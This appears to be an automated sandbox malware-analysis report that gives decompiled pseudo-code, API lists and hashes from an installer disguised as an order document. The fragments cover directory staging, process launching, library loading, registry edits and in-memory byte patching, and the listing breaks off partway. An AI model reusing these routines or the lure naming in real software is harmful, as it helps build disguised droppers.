                                                			E004015B9(short __ebx, void* __eflags) {
                                                				void* _t17;
                                                				int _t23;
                                                				void* _t25;
                                                				signed char _t26;
                                                				short _t28;
                                                				short _t31;
                                                				short* _t34;
                                                				void* _t36;
                                                
                                                				_t28 = __ebx;
                                                				 *(_t36 + 8) = E00402BBF(0xfffffff0);
                                                				_t17 = E00405A91(_t16);
                                                				_t32 = _t17;
                                                				if(_t17 != __ebx) {
                                                					do {
                                                						_t34 = E00405A13(_t32, 0x5c);
                                                						_t31 =  *_t34;
                                                						 *_t34 = _t28;
                                                						if(_t31 != _t28) {
                                                							L5:
                                                							_t25 = E004056DD( *(_t36 + 8));
                                                						} else {
                                                							_t42 =  *((intOrPtr*)(_t36 - 0x24)) - _t28;
                                                							if( *((intOrPtr*)(_t36 - 0x24)) == _t28 || E004056FA(_t42) == 0) {
                                                								goto L5;
                                                							} else {
                                                								_t25 = E00405660( *(_t36 + 8)); // executed
                                                							}
                                                						}
                                                						if(_t25 != _t28) {
                                                							if(_t25 != 0xb7) {
                                                								L9:
                                                								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                							} else {
                                                								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                								if((_t26 & 0x00000010) == 0) {
                                                									goto L9;
                                                								}
                                                							}
                                                						}
                                                						 *_t34 = _t31;
                                                						_t32 = _t34 + 2;
                                                					} while (_t31 != _t28);
                                                				}
                                                				if( *((intOrPtr*)(_t36 - 0x28)) == _t28) {
                                                					_push(0xfffffff5);
                                                					E00401423();
                                                				} else {
                                                					E00401423(0xffffffe6);
                                                					E00406032(L"C:\\Users\\frontdesk\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis\\Grusendes\\Stoser\\Unappealingness\\Dermobranchiate",  *(_t36 + 8));
                                                					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                					if(_t23 == 0) {
                                                						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                					}
                                                				}
                                                				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t36 - 4));
                                                				return 0;
                                                			}

                                                APIs
                                                  • Part of subcall function 00405A91: CharNextW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,0040A300,00405B05,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,772EFAA0,?,C:\Users\user~1\AppData\Local\Temp\,00405843,?,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"), ref: 00405A9F
                                                  • Part of subcall function 00405A91: CharNextW.USER32(00000000), ref: 00405AA4
                                                  • Part of subcall function 00405A91: CharNextW.USER32(00000000), ref: 00405ABC
                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                  • Part of subcall function 00405660: CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user~1\AppData\Local\Temp\), ref: 004056A3
                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Grusendes\Stoser\Unappealingness\Dermobranchiate,?,00000000,000000F0), ref: 00401645
                                                Strings
                                                • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Grusendes\Stoser\Unappealingness\Dermobranchiate, xrefs: 00401638
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Grusendes\Stoser\Unappealingness\Dermobranchiate
                                                • API String ID: 1892508949-2561518016
                                                • Opcode ID: 6a1f85d338ebb5bb54d8052e3a08a01253941d961bae5fb58311d3ff7cefe74a
                                                • Instruction ID: 415897e78b6bad03a127c6f6368a694d7e54beaaa1ae65b52f31c6ed2c47f3e3
                                                • Opcode Fuzzy Hash: 6a1f85d338ebb5bb54d8052e3a08a01253941d961bae5fb58311d3ff7cefe74a
                                                • Instruction Fuzzy Hash: 8C11E631504514ABCF20BFA4CD4099E36B1EF44364B24093BEA05B62F1DA3E4E819F5D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405712(WCHAR* _a4) {
                                                				struct _PROCESS_INFORMATION _v20;
                                                				int _t7;
                                                
                                                				0x7a4f48->cb = 0x44;
                                                				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x7a4f48,  &_v20); // executed
                                                				if(_t7 != 0) {
                                                					CloseHandle(_v20.hThread);
                                                					return _v20.hProcess;
                                                				}
                                                				return _t7;
                                                			}

                                                APIs
                                                • CreateProcessW.KERNELBASE ref: 0040573B
                                                • CloseHandle.KERNEL32(0040A300), ref: 00405748
                                                Strings
                                                • Error launching installer, xrefs: 00405725
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: CloseCreateHandleProcess
                                                • String ID: Error launching installer
                                                • API String ID: 3712363035-66219284
                                                • Opcode ID: 3637be9cb8c8c178a0f5493f73af728e1da129e746f7561b800f2829df1c9c8b
                                                • Instruction ID: 7a3daaf9c9c1dfce14d3e2680162b4324113c6786a0a66257257a350a584d1d9
                                                • Opcode Fuzzy Hash: 3637be9cb8c8c178a0f5493f73af728e1da129e746f7561b800f2829df1c9c8b
                                                • Instruction Fuzzy Hash: 67E046F4600209BFEB10AB60ED49F7B7BACEB44204F008420BE50F2190DAB8D8108A78
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 60%
                                                			E00401FC3(void* __ebx, void* __eflags) {
                                                				struct HINSTANCE__* _t23;
                                                				struct HINSTANCE__* _t31;
                                                				void* _t32;
                                                				void* _t34;
                                                				WCHAR* _t37;
                                                				intOrPtr* _t38;
                                                				void* _t39;
                                                
                                                				_t32 = __ebx;
                                                				asm("sbb eax, 0x7a8af8");
                                                				 *(_t39 - 4) = 1;
                                                				if(__eflags < 0) {
                                                					_push(0xffffffe7);
                                                					L15:
                                                					E00401423();
                                                					L16:
                                                					 *0x7a8ac8 =  *0x7a8ac8 +  *(_t39 - 4);
                                                					return 0;
                                                				}
                                                				_t37 = E00402BBF(0xfffffff0);
                                                				 *((intOrPtr*)(_t39 - 8)) = E00402BBF(1);
                                                				if( *((intOrPtr*)(_t39 - 0x1c)) == __ebx) {
                                                					L3:
                                                					_t23 = LoadLibraryExW(_t37, _t32, 8); // executed
                                                					 *(_t39 + 8) = _t23;
                                                					if(_t23 == _t32) {
                                                						_push(0xfffffff6);
                                                						goto L15;
                                                					}
                                                					L4:
                                                					_t38 = E00406477( *(_t39 + 8),  *((intOrPtr*)(_t39 - 8)));
                                                					if(_t38 == _t32) {
                                                						E00405191(0xfffffff7,  *((intOrPtr*)(_t39 - 8)));
                                                					} else {
                                                						 *(_t39 - 4) = _t32;
                                                						if( *((intOrPtr*)(_t39 - 0x24)) == _t32) {
                                                							 *_t38( *((intOrPtr*)(_t39 - 0xc)), 0x400, _t34, 0x40cdcc, 0x40a000); // executed
                                                						} else {
                                                							E00401423( *((intOrPtr*)(_t39 - 0x24)));
                                                							if( *_t38() != 0) {
                                                								 *(_t39 - 4) = 1;
                                                							}
                                                						}
                                                					}
                                                					if( *((intOrPtr*)(_t39 - 0x20)) == _t32 && E0040381B( *(_t39 + 8)) != 0) {
                                                						FreeLibrary( *(_t39 + 8)); // executed
                                                					}
                                                					goto L16;
                                                				}
                                                				_t31 = GetModuleHandleW(_t37); // executed
                                                				 *(_t39 + 8) = _t31;
                                                				if(_t31 != __ebx) {
                                                					goto L4;
                                                				}
                                                				goto L3;
                                                			}

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE
                                                  • Part of subcall function 00405191: lstrlenW.KERNEL32(007A0F20,00000000,007924F8,772EEA30,?,?,?,?,?,?,?,?,?,00403168,00000000,?), ref: 004051C9
                                                  • Part of subcall function 00405191: lstrlenW.KERNEL32(00403168,007A0F20,00000000,007924F8,772EEA30,?,?,?,?,?,?,?,?,?,00403168,00000000), ref: 004051D9
                                                  • Part of subcall function 00405191: lstrcatW.KERNEL32(007A0F20,00403168), ref: 004051EC
                                                  • Part of subcall function 00405191: SetWindowTextW.USER32(007A0F20,007A0F20), ref: 004051FE
                                                  • Part of subcall function 00405191: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405224
                                                  • Part of subcall function 00405191: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523E
                                                  • Part of subcall function 00405191: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524C
                                                • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
                                                • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,?,?,00000008,00000001,000000F0), ref: 0040207C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                • String ID:
                                                • API String ID: 334405425-0
                                                • Opcode ID: cb89a4fd28b95848d33a1bfc1764e9066b0be27e0c87ae0b066b9e15343262a0
                                                • Instruction ID: f6a722eb4006bf24fd89555576c47c1226d97d21954259867b0b9a1495a6a6e6
                                                • Opcode Fuzzy Hash: cb89a4fd28b95848d33a1bfc1764e9066b0be27e0c87ae0b066b9e15343262a0
                                                • Instruction Fuzzy Hash: 6F219531900209EBCF20AFA5CE48A9E7E71BF00354F20427BF510B51E1CBBD8A81DA5E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E0040249E(int* __ebx, short* __esi) {
                                                				void* _t7;
                                                				int _t8;
                                                				long _t11;
                                                				int* _t14;
                                                				void* _t18;
                                                				short* _t20;
                                                				void* _t22;
                                                				void* _t25;
                                                
                                                				_t20 = __esi;
                                                				_t14 = __ebx;
                                                				_t7 = E00402CC9(_t25, 0x20019); // executed
                                                				_t18 = _t7;
                                                				_t8 = E00402BA2(3);
                                                				 *__esi = __ebx;
                                                				if(_t18 == __ebx) {
                                                					L7:
                                                					 *((intOrPtr*)(_t22 - 4)) = 1;
                                                				} else {
                                                					 *(_t22 + 8) = 0x3ff;
                                                					if( *((intOrPtr*)(_t22 - 0x1c)) == __ebx) {
                                                						_t11 = RegEnumValueW(_t18, _t8, __esi, _t22 + 8, __ebx, __ebx, __ebx, __ebx);
                                                						__eflags = _t11;
                                                						if(_t11 != 0) {
                                                							goto L7;
                                                						} else {
                                                							goto L4;
                                                						}
                                                					} else {
                                                						RegEnumKeyW(_t18, _t8, __esi, 0x3ff);
                                                						L4:
                                                						_t20[0x3ff] = _t14;
                                                						_push(_t18);
                                                						RegCloseKey();
                                                					}
                                                				}
                                                				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t22 - 4));
                                                				return 0;
                                                			}

                                                Instruction addresses (address column of the decompiled listing, one entry per line of the C-Code above): 0x0040249e, 0x0040249e, 0x004024a3, 0x004024aa, 0x004024ac, 0x004024b3, 0x004024b6, 0x0040281e, 0x0040281e, 0x004024bc, 0x004024c4, 0x004024c7, 0x004024e0, 0x004024e6, 0x004024e8, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x004024c9, 0x004024cd, 0x004024ee, 0x004024ee, 0x004024f5, 0x004024f6, 0x004024f6, 0x004024c7, 0x00402a4f, 0x00402a5b

                                                APIs
                                                  • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?,?,0040232B,00000002), ref: 00402CF1
                                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                                • RegEnumValueW.ADVAPI32 ref: 004024E0
                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Enum$CloseOpenValue
                                                • String ID:
                                                • API String ID: 167947723-0
                                                • Opcode ID: 9265ab6f625e07d86975ae9e6924e5a372e872d8d6f540d845591db09282f072
                                                • Instruction ID: b3b69fb6c0ab9d70611345d1cc2aadb4deec7d6fa7b8fc5cea9b38d3f519ee44
                                                • Opcode Fuzzy Hash: 9265ab6f625e07d86975ae9e6924e5a372e872d8d6f540d845591db09282f072
                                                • Instruction Fuzzy Hash: 38F08171A00204ABEB209FA5DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                
                                                				 *0x10004048 = _a4;
                                                				if(_a8 == 1) {
                                                					VirtualProtect(0x1000405c, 4, 0x40, 0x1000404c); // executed
                                                					 *0x1000405c = 0xc2;
                                                					 *0x1000404c = 0;
                                                					 *0x10004054 = 0;
                                                					 *0x10004068 = 0;
                                                					 *0x10004058 = 0;
                                                					 *0x10004050 = 0;
                                                					 *0x10004060 = 0;
                                                					 *0x1000405e = 0;
                                                				}
                                                				return 1;
                                                			}

                                                Instruction addresses (address column of the decompiled listing, one entry per line of the C-Code above): 0x100027d0, 0x100027d5, 0x100027e5, 0x100027ed, 0x100027f4, 0x100027f9, 0x100027fe, 0x10002803, 0x10002808, 0x1000280d, 0x10002812, 0x10002812, 0x1000281a

                                                APIs
                                                • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.514496286.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.514490574.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000000.00000002.514501973.0000000010003000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000000.00000002.514506940.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID: `g)w@M)w
                                                • API String ID: 544645111-4193802306
                                                • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 69%
                                                			E00401389(signed int _a4) {
                                                				intOrPtr* _t6;
                                                				void* _t8;
                                                				void* _t10;
                                                				signed int _t11;
                                                				void* _t12;
                                                				signed int _t16;
                                                				signed int _t17;
                                                				void* _t18;
                                                
                                                				_t17 = _a4;
                                                				while(_t17 >= 0) {
                                                					_t6 = _t17 * 0x1c +  *0x7a8a70;
                                                					if( *_t6 == 1) {
                                                						break;
                                                					}
                                                					_push(_t6); // executed
                                                					_t8 = E00401434(); // executed
                                                					if(_t8 == 0x7fffffff) {
                                                						return 0x7fffffff;
                                                					}
                                                					_t10 = E0040136D(_t8);
                                                					if(_t10 != 0) {
                                                						_t11 = _t10 - 1;
                                                						_t16 = _t17;
                                                						_t17 = _t11;
                                                						_t12 = _t11 - _t16;
                                                					} else {
                                                						_t12 = _t10 + 1;
                                                						_t17 = _t17 + 1;
                                                					}
                                                					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                						 *0x7a7a2c =  *0x7a7a2c + _t12;
                                                						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x7a7a2c, 0x7530,  *0x7a7a14), 0); // executed
                                                					}
                                                				}
                                                				return 0;
                                                			}

                                                Instruction addresses (address column of the decompiled listing, one entry per line of the C-Code above): 0x0040138a, 0x004013fa, 0x0040139b, 0x004013a0, 0x00000000, 0x00000000, 0x004013a2, 0x004013a3, 0x004013ad, 0x00000000, 0x00401404, 0x004013b0, 0x004013b7, 0x004013bd, 0x004013be, 0x004013c0, 0x004013c2, 0x004013b9, 0x004013b9, 0x004013ba, 0x004013ba, 0x004013c9, 0x004013cb, 0x004013f4, 0x004013f4, 0x004013c9, 0x00000000

                                                APIs
                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 564535d36588263e3f9deefe94a200e845c26c7dee2e47344d25cef9fda2a614
                                                • Instruction ID: 4d11fbcb8758acff49efb51301ce17a4c0d3f2729c831b224df7ca8d4f3fd522
                                                • Opcode Fuzzy Hash: 564535d36588263e3f9deefe94a200e845c26c7dee2e47344d25cef9fda2a614
                                                • Instruction Fuzzy Hash: 0D01F432624210ABE7095B389D04B6A3698E755314F10C53FF851F66F1DA78CC02DB4D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040231F(void* __ebx) {
                                                				short* _t6;
                                                				long _t8;
                                                				void* _t11;
                                                				void* _t15;
                                                				long _t19;
                                                				void* _t22;
                                                				void* _t23;
                                                
                                                				_t15 = __ebx;
                                                				_t26 =  *(_t23 - 0x1c) - __ebx;
                                                				if( *(_t23 - 0x1c) != __ebx) {
                                                					_t6 = E00402BBF(0x22);
                                                					_t18 =  *(_t23 - 0x1c) & 0x00000002;
                                                					__eflags =  *(_t23 - 0x1c) & 0x00000002;
                                                					_t8 = E00402BFF(E00402CB4( *((intOrPtr*)(_t23 - 0x28))), _t6, _t18); // executed
                                                					_t19 = _t8;
                                                					goto L4;
                                                				} else {
                                                					_t11 = E00402CC9(_t26, 2); // executed
                                                					_t22 = _t11;
                                                					if(_t22 == __ebx) {
                                                						L6:
                                                						 *((intOrPtr*)(_t23 - 4)) = 1;
                                                					} else {
                                                						_t19 = RegDeleteValueW(_t22, E00402BBF(0x33));
                                                						RegCloseKey(_t22);
                                                						L4:
                                                						if(_t19 != _t15) {
                                                							goto L6;
                                                						}
                                                					}
                                                				}
                                                				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t23 - 4));
                                                				return 0;
                                                			}

                                                Instruction addresses (address column of the decompiled listing, one entry per line of the C-Code above): 0x0040231f, 0x0040231f, 0x00402322, 0x00402351, 0x00402359, 0x00402359, 0x00402367, 0x0040236c, 0x00000000, 0x00402324, 0x00402326, 0x0040232b, 0x0040232f, 0x0040281e, 0x0040281e, 0x00402335, 0x00402345, 0x00402347, 0x0040236e, 0x00402370, 0x00000000, 0x00402376, 0x00402370, 0x0040232f, 0x00402a4f, 0x00402a5b

                                                APIs
                                                  • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?,?,0040232B,00000002), ref: 00402CF1
                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033,00000002), ref: 0040233E
                                                • RegCloseKey.ADVAPI32(00000000), ref: 00402347
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: CloseDeleteOpenValue
                                                • String ID:
                                                • API String ID: 849931509-0
                                                • Opcode ID: 77460bd49ef5699d8326dfc913d723684c59f90a6791b38fbb55a59eac76fc56
                                                • Instruction ID: 84b37c2a738164438e1dccf168bab5f9c0075825efa18c6fe23cdbeb1825a049
                                                • Opcode Fuzzy Hash: 77460bd49ef5699d8326dfc913d723684c59f90a6791b38fbb55a59eac76fc56
                                                • Instruction Fuzzy Hash: 03F04F72A04110ABEB11BFF59B4EABE7269AB80314F15803BF501B71D5D9FC99015629
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040156B(void* __ebx) {
                                                				int _t4;
                                                				void* _t9;
                                                				struct HWND__* _t11;
                                                				struct HWND__* _t12;
                                                				void* _t16;
                                                
                                                				_t9 = __ebx;
                                                				_t11 =  *0x7a7a10; // 0x0
                                                				if(_t11 != __ebx) {
                                                					ShowWindow(_t11,  *(_t16 - 0x28));
                                                					_t4 =  *(_t16 - 0x2c);
                                                				}
                                                				_t12 =  *0x7a7a24; // 0x103b4
                                                				if(_t12 != _t9) {
                                                					ShowWindow(_t12, _t4); // executed
                                                				}
                                                				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t16 - 4));
                                                				return 0;
                                                			}

                                                Instruction addresses (address column of the decompiled listing, one entry per line of the C-Code above): 0x0040156b, 0x0040156b, 0x00401579, 0x0040157f, 0x00401581, 0x00401581, 0x00401584, 0x0040158c, 0x00401594, 0x00401594, 0x00402a4f, 0x00402a5b

                                                APIs
                                                • ShowWindow.USER32(00000000,?), ref: 0040157F
                                                • ShowWindow.USER32(000103B4), ref: 00401594
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
